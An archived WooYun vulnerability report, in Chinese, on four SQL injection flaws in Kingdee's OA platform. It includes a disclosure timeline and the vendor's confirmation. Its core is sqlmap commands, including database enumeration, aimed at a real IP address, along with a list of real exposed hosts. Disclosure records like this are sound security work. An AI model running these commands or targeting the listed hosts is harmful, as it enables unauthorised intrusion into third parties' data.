乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-03: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经确认,细节仅向厂商公开 2015-08-06: 细节向第三方安全合作伙伴开放 2015-09-27: 细节向核心白帽子及相关领域专家公开 2015-10-07: 细节向普通白帽子公开 2015-10-17: 细节向实习白帽子公开 2015-11-01: 细节向公众公开
金蝶OA办公系统存在多个SQL注入漏洞
金蝶OA协作办公平台存在四个SQL注入漏洞具体详情如下:
/kingdee/custom/add_view_case.jsp?type=1&flag=1 type参数/kingdee/custom/del_view_case.jsp?table_id=1 table_id参数存在注入/kingdee/custom/table_view_case_modify.jsp?dbid=1&selid=1 dbid selid均存在注入/kingdee/custom/view_display.jsp?table_id=1&search_case=1 两个参数均存在注入
0x SQL注入一
sqlmap.py -u "http://221.226.149.17:8080/kingdee/custom/add_view_case.jsp?type=1&flag=1"
0x SQL注入二
sqlmap.py -u "http://221.226.149.17:8080/kingdee/custom/del_view_case.jsp?table_id=1"
0x SQL注入三
sqlmap.py -u "http://221.226.149.17:8080/kingdee/custom/table_view_case_modify.jsp?dbid=1&selid=1"
0x SQL注入四
sqlmap.py -u "http://221.226.149.17:8080/kingdee/custom/view_display.jsp?table_id=1&search_case=1"
互联网上的案例非常多,随便列举几个:
http://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://122.139.60.103:800/kingdee/login/loginpage.jsphttp://oa.guanhao.com:8080/kingdee/login/loginpage.jsphttp://222.179.238.182:8082/kingdee/login/loginpage2.jsphttp://222.134.77.23:8080/kingdee/login/loginpage.jsphttp://221.4.245.218:8080/kingdee/login/loginpage.jsphttp://221.226.149.17:8080/kingdee/login/loginpage.jsphttp://220.189.244.202:8080/kingdee/login/loginpage.jsphttp://222.133.44.10:8080/kingdee/login/loginpage.jsphttp://223.95.183.6:8080/kingdee/login/loginpage.jsphttp://61.190.20.51/kingdee/login/loginpage.jsphttp://60.194.110.187/kingdee/login/loginpage.jsphttp://oa.roen.cn/kingdee/login/loginpage.jsp
直接用SQLMAP
即可跑出数据,如下所示:
sqlmap.py -u "http://221.226.149.17:8080/kingdee/custom/view_display.jsp?table_id=1&search_case=1" --dbs
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-08-03 16:08
谢谢对金蝶的关注,此产品为合作伙伴产品,我们已通知相关部门为客户修复。
暂无